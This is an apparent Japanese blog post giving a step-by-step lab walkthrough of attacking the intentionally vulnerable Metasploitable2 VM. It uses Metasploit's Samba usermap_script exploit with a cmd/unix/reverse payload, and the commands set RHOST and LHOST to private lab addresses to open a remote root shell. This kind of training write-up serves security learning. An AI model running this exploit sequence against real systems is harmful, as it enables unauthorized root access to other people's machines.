FC2ブログ

metasploitable2 samba攻略

metasploitable2 samba攻略

virtualbox を起動し
BT5R3
metasploitable2
を起動

以下、BT5R3 の操作

まず root でログインして
startx で X windows 起動

service nessusd start
でNessus起動

msfconsole

MSF起動

load nessus
で MSFから Nessus 接続機能ロード

nessus_connect hjuser:Nessusのパスワード@127.0.0.1
でNessus 接続

search samba
で samba の脆弱性を調べる

この中から
use exploit/multi/samba/usermap_script
で使用する Exploit を指定

次に指定可能なオプションを
show options
で確認

オプションの確認ができたら
RHOST、つまり対象の設定
set RHOST 192.168.10.214

次に show payloads
を実行して、実行可能な payload の確認

この中から指定する payload の指定をする
set payload cmd/unix/reverse

一覧のときには
payloads なのに、
セットするときには payload なので注意

reverse では
相手側から自ホスト側に接続が行われるので
自ホスト側の設定が必要になるので

show options
でオプションを確認すると
LHOST
LPORT
の設定がでているのが確認できるので
設定する

オプションで確認したときに
Required のところに yes となっているけど
これは必須項目という意味

とりあえず、自マシンのIPが必要なので
ifconfig で調べて
set LHOST 192.168.10.174
というように
set LHOST BT5R3のIPアドレス
と設定する

これをやらないと exploit が実行できない

これで、再び
show options
で設定を確認して LHOST にIPアドレスが
設定されたか確認する

ここまでできたら、
exploit
で実行

Command shell session 1 opened
となるまで待つ
あとは、 vsftpd のときと同じように
id;
でroot 権限になっているか
ifconfig:
でIPの確認
などで権限やリモートシェルの確認ができればOK

終了したいときには
Ctrl + c で
Abort session 1? [y/N] y
で終了できる

今回の参考書籍

スポンサーサイト



テーマ : セキュリティ
ジャンル : コンピュータ

コメント

非公開コメント

最新記事
検索フォーム
GREEハコニワ攻略サイト
リンク
カテゴリ
月別アーカイブ
フリーエリア
最新記事
FXプライムレート
最新コメント
最新トラックバック